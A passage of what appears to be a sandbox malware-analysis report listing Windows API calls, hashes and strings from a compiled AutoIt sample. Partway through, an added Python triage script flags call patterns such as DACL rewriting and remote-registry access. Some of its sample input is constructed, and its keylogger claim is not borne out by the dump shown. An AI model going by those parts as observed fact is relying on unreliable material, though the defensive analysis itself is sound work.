                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E4E647
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E4E68C
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E4E6C3
                                                                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00E4BEAF), ref: 00E4E6CF
                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E4E6DF
                                                                                                                  • DestroyCursor.USER32(?), ref: 00E4E6EE
                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E4E70B
                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E4E717
                                                                                                                    • Part of subcall function 00E00FA7: __wcsicmp_l.LIBCMT ref: 00E01030
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                  • API String ID: 3907162815-1154884017
                                                                                                                  • Opcode ID: ee0bff41b58763c2a64516a90ccc1d5a54511568dfcaf69621b684d5e2631c02
                                                                                                                  • Instruction ID: 7aeafe63d6d127c832637d4b5c01ae9fb1c4610e70bbd9ec286e91c3c53844e1
                                                                                                                  • Opcode Fuzzy Hash: ee0bff41b58763c2a64516a90ccc1d5a54511568dfcaf69621b684d5e2631c02
                                                                                                                  • Instruction Fuzzy Hash: A761BF71A00215FEEB24DF64EC46FBE7BA8BB18764F104145F911F62D1EBB49980CB60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
                                                                                                                    • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00E2D292
                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 00E2D2DF
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E2D327
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E2D35E
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E2D38C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                  • API String ID: 1148790751-4113822522
                                                                                                                  • Opcode ID: 867dcd77f8bbfc59b860cbb50228ed37855c90e35d3efec4091b490b5f16e38f
                                                                                                                  • Instruction ID: ad2fe8d29dd58aa5a5925c80f770849a9e190a40d9ac17b87cf36dd7b542da3c
                                                                                                                  • Opcode Fuzzy Hash: 867dcd77f8bbfc59b860cbb50228ed37855c90e35d3efec4091b490b5f16e38f
                                                                                                                  • Instruction Fuzzy Hash: F1517B715043449FC700EF21D88196EB3E4FF98758F00986DF986672A1DB71EE0ACBA2
                                                                                                                  APIs
                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E2D0D8
                                                                                                                  • __swprintf.LIBCMT ref: 00E2D0FA
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E2D137
                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E2D15C
                                                                                                                  • _memset.LIBCMT ref: 00E2D17B
                                                                                                                  • _wcsncpy.LIBCMT ref: 00E2D1B7
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E2D1EC
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00E2D1F7
                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00E2D200
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00E2D20A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                  • API String ID: 2733774712-3457252023
                                                                                                                  • Opcode ID: 92f781dac6cff2d6ca6690e75f670932ecffa07a5fbde3d1689f37d5cd6808a8
                                                                                                                  • Instruction ID: 03056019d185e6272ce7aa442843ff50be705af7d16df0628c0c8bfe6ec8f5a7
                                                                                                                  • Opcode Fuzzy Hash: 92f781dac6cff2d6ca6690e75f670932ecffa07a5fbde3d1689f37d5cd6808a8
                                                                                                                  • Instruction Fuzzy Hash: 6A31C772904119ABDB21DFA1DC48FEB77BCEF89744F5050B6F609E11A0E77096448B34
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00E4BEF4,?,?), ref: 00E4E754
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00E4BEF4,?,?,00000000,?), ref: 00E4E76B
                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00E4BEF4,?,?,00000000,?), ref: 00E4E776
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00E4BEF4,?,?,00000000,?), ref: 00E4E783
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00E4E78C
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E4BEF4,?,?,00000000,?), ref: 00E4E79B
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00E4E7A4
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00E4BEF4,?,?,00000000,?), ref: 00E4E7AB
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E4E7BC
                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E6D9BC,?), ref: 00E4E7D5
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00E4E7E5
                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00E4E809
                                                                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00E4E834
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00E4E85C
                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E4E872
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3840717409-0
                                                                                                                  • Opcode ID: c3ddf8e95db73793d9956e94e66f4c2fd2daeec93d9d07d8d83598baf866c1d7
                                                                                                                  • Instruction ID: 7b433125649b2a19cbf9ebeb350bad93361631f840398d4243a4911c6eb2969b
                                                                                                                  • Opcode Fuzzy Hash: c3ddf8e95db73793d9956e94e66f4c2fd2daeec93d9d07d8d83598baf866c1d7
                                                                                                                  • Instruction Fuzzy Hash: B7414975A00204EFDB119F66EC88EAB7BB9FF89765F108058F906E7260D7B09D44CB20
                                                                                                                  APIs
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E3076F
                                                                                                                  • _wcscat.LIBCMT ref: 00E30787
                                                                                                                  • _wcscat.LIBCMT ref: 00E30799
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E307AE
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E307C2
                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00E307DA
                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E307F4
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E30806
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 34673085-438819550
                                                                                                                  • Opcode ID: fccc05fe530891622bc4675ee102b01f4d66e9de4532baa21167b9644f309170
                                                                                                                  • Instruction ID: f0402759e5619856fdcf40417aa9afc208978feb5298076f20a6393e1c174812
                                                                                                                  • Opcode Fuzzy Hash: fccc05fe530891622bc4675ee102b01f4d66e9de4532baa21167b9644f309170
                                                                                                                  • Instruction Fuzzy Hash: 278181715043459FCB24EF24C8699AEBBE8FFC8304F14982EF885E7251E630D954CB92
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E1ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E1ABD7
                                                                                                                    • Part of subcall function 00E1ABBB: GetLastError.KERNEL32(?,00E1A69F,?,?,?), ref: 00E1ABE1
                                                                                                                    • Part of subcall function 00E1ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00E1A69F,?,?,?), ref: 00E1ABF0
                                                                                                                    • Part of subcall function 00E1ABBB: RtlAllocateHeap.NTDLL(00000000,?,00E1A69F), ref: 00E1ABF7
                                                                                                                    • Part of subcall function 00E1ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E1AC0E
                                                                                                                    • Part of subcall function 00E1AC56: GetProcessHeap.KERNEL32(00000008,00E1A6B5,00000000,00000000,?,00E1A6B5,?), ref: 00E1AC62
                                                                                                                    • Part of subcall function 00E1AC56: RtlAllocateHeap.NTDLL(00000000,?,00E1A6B5), ref: 00E1AC69
                                                                                                                    • Part of subcall function 00E1AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E1A6B5,?), ref: 00E1AC7A
                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E1A8CB
                                                                                                                  • _memset.LIBCMT ref: 00E1A8E0
                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E1A8FF
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00E1A910
                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00E1A94D
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E1A969
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00E1A986
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E1A995
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E1A99C
                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E1A9BD
                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00E1A9C4
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E1A9F5
                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E1AA1B
                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E1AA2F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2347767575-0
                                                                                                                  • Opcode ID: a337608bd5c6524ee30d1116a3b3ea95d179afe495065bda04e5bb29b2c96cd3
                                                                                                                  • Instruction ID: ed600657ab467ee101d0c40a11c43b05af2bb7a66014ed720ba81d6f2349dd62
                                                                                                                  • Opcode Fuzzy Hash: a337608bd5c6524ee30d1116a3b3ea95d179afe495065bda04e5bb29b2c96cd3
                                                                                                                  • Instruction Fuzzy Hash: 2D515B71A01209AFDF10DF91ED44EFEBBBAFF04304F089129E811B6291DB749A45CB61
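The per-function "APIs" listings above (the CreateFileW/ReadFile/CreateStreamOnHGlobal/OleLoadPicture loader, and the GetSecurityDescriptorDacl/AddAce/SetSecurityDescriptorDacl/SetUserObjectSecurity sequence that rewrites a user object's DACL) are the part of such a report an analyst actually reads when deciding what a function does. The following is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: a small parser for the report's listing line format ("• Func.MODULE(args), ref: ADDR", with the "Part of subcall function" prefix the sandbox uses for calls attributed to callees), an ordered-subsequence matcher that flags call patterns, and a decoder for CreateFileW's access/disposition arguments. The sample input is copied from the listing lines on this page; the pattern labels, the Win32 constant tables and the assumption that every listing line follows the shown format are mine, and the sandbox's own "API String ID" hashing is not reproduced.

```python
"""Added example, not from the Joe Sandbox report: parse its per-function
"APIs" listings and flag call sequences worth a closer look."""
import re
from dataclasses import dataclass
from typing import Optional

# One listing line: "• Func.MODULE(args), ref: ADDR".  CRT calls appear as
# "• _memset.LIBCMT ref: ADDR" (no argument list).  Calls the sandbox
# attributes to a callee carry a "Part of subcall function ADDR:" prefix.
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

@dataclass(frozen=True)
class ApiCall:
    func: str
    module: str
    args: tuple                # raw argument tokens; "?" = unresolved by the sandbox
    ref: int                   # call-site address
    subcall_of: Optional[str]  # callee address when listed as a subcall, else None

def parse_api_block(text: str) -> list:
    """Return the ApiCall records of one function's APIs block, in report order."""
    calls = []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if m:  # headers such as "APIs"/"Strings" and unrelated lines are skipped
            args = tuple(a.strip() for a in (m["args"] or "").split(",") if a.strip())
            calls.append(ApiCall(m["func"], m["mod"], args, int(m["ref"], 16), m["sub"]))
    return calls

# Ordered API subsequences to flag; other calls may sit between the listed ones.
# Labels are mine (assumption), chosen to match the functions listed on this page.
PATTERNS = {
    "image_loaded_from_file_via_ole": ("CreateFileW", "ReadFile", "CreateStreamOnHGlobal", "OleLoadPicture"),
    "user_object_dacl_rewritten": ("GetSecurityDescriptorDacl", "AddAce", "SetSecurityDescriptorDacl", "SetUserObjectSecurity"),
    "remote_registry_over_net_share": ("WNetAddConnection2W", "RegConnectRegistryW"),
}

def _is_ordered_subsequence(names, wanted):
    it = iter(names)  # one shared iterator, so order is enforced
    return all(any(n == w for n in it) for w in wanted)

def flag_patterns(calls) -> list:
    """Labels of every PATTERNS entry present in the call sequence (subcalls included)."""
    names = [c.func for c in calls]
    return sorted(lbl for lbl, seq in PATTERNS.items() if _is_ordered_subsequence(names, seq))

# Win32 constants for CreateFileW's dwDesiredAccess (arg 2) and dwCreationDisposition (arg 5).
_GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
            0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

def describe_createfile(call: ApiCall):
    """(access_names, disposition) for a CreateFileW call, or None if it is not
    CreateFileW or the sandbox left those argument slots as '?'."""
    if call.func != "CreateFileW" or len(call.args) < 5:
        return None
    try:
        access, dispo = int(call.args[1], 16), int(call.args[4], 16)
    except ValueError:
        return None
    names = tuple(n for bit, n in _GENERIC.items() if access & bit)
    return names, _DISPOSITION.get(dispo, f"0x{dispo:X}")

# Constructed sample: listing lines copied from the report above, one block per function.
SAMPLES = {
    "picture_loader": """\
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00E4BEF4,?,?), ref: 00E4E754
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E4BEF4,?,?,00000000,?), ref: 00E4E79B
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E4E7BC
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00E6D9BC,?), ref: 00E4E7D5
""",
    "dacl_rewriter": """\
  • Part of subcall function 00E1ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E1ABD7
  • Part of subcall function 00E1AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E1A6B5,?), ref: 00E1AC7A
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E1A8CB
• _memset.LIBCMT ref: 00E1A8E0
• GetAce.ADVAPI32(?,00000000,?), ref: 00E1A94D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E1A969
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E1AA1B
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E1AA2F
""",
    "remote_registry": """\
• _memset.LIBCMT ref: 00E1A1DC
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E1A211
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E1A22D
""",
}

def triage(samples=SAMPLES) -> dict:
    """Map each sample block name to the pattern labels found in it."""
    return {name: flag_patterns(parse_api_block(block)) for name, block in samples.items()}
```

Two details the decoder and the listing make visible without running anything: the CreateFileW call opens its target with GENERIC_READ and OPEN_EXISTING (0x80000000, 3), i.e. it reads an existing file into a global memory block and hands it to OleLoadPicture, which is an image load rather than a payload drop; and SetUserObjectSecurity is called with 0x4 (DACL_SECURITY_INFORMATION), consistent with the GetAce/AddAce edits in the same function, so the sequence rewrites the DACL of a window station or desktop object. These sequences are part of the AutoIt runtime the sample was compiled with (the report flags it as a compiled AutoIt script), so on their own they identify the interpreter, not the keylogger payload.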
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString__swprintf_wprintf
                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                  • API String ID: 2889450990-2391861430
                                                                                                                  • Opcode ID: 3c0a0cf8ce7cd714222bd09ff865b5806cfa6304cbc26c711511ac92c080c441
                                                                                                                  • Instruction ID: 9e037a1400fe885a2e00b80aed5c7352340c651908aec8905bd6149e832c54e8
                                                                                                                  • Opcode Fuzzy Hash: 3c0a0cf8ce7cd714222bd09ff865b5806cfa6304cbc26c711511ac92c080c441
                                                                                                                  • Instruction Fuzzy Hash: 27516A31800259BACF15FBA1DD82EEEB7B8EF09344F2011A5F505720A2EB716E59DB71
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString__swprintf_wprintf
                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                  • API String ID: 2889450990-3420473620
                                                                                                                  • Opcode ID: ef39a869b6799b957b9e1866f6bb03162b9eb7dd333e50bae213e1228a746653
                                                                                                                  • Instruction ID: 4d89cf52ff77e678865464b87fc604af34d7e257bbdaa3a1e742695f970ab45c
                                                                                                                  • Opcode Fuzzy Hash: ef39a869b6799b957b9e1866f6bb03162b9eb7dd333e50bae213e1228a746653
                                                                                                                  • Instruction Fuzzy Hash: 97516B31900259AACF15FBA1ED42EEEB7B8EF08344F2051A5F505720A2EB706F59DB71
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E255D7
                                                                                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00E25664
                                                                                                                  • GetMenuItemCount.USER32(00EA1708), ref: 00E256ED
                                                                                                                  • DeleteMenu.USER32(00EA1708,00000005,00000000,000000F5,?,?), ref: 00E2577D
                                                                                                                  • DeleteMenu.USER32(00EA1708,00000004,00000000), ref: 00E25785
                                                                                                                  • DeleteMenu.USER32(00EA1708,00000006,00000000), ref: 00E2578D
                                                                                                                  • DeleteMenu.USER32(00EA1708,00000003,00000000), ref: 00E25795
                                                                                                                  • GetMenuItemCount.USER32(00EA1708), ref: 00E2579D
                                                                                                                  • SetMenuItemInfoW.USER32(00EA1708,00000004,00000000,00000030), ref: 00E257D3
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E257DD
                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00E257E6
                                                                                                                  • TrackPopupMenuEx.USER32(00EA1708,00000000,?,00000000,00000000,00000000), ref: 00E257F9
                                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E25805
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
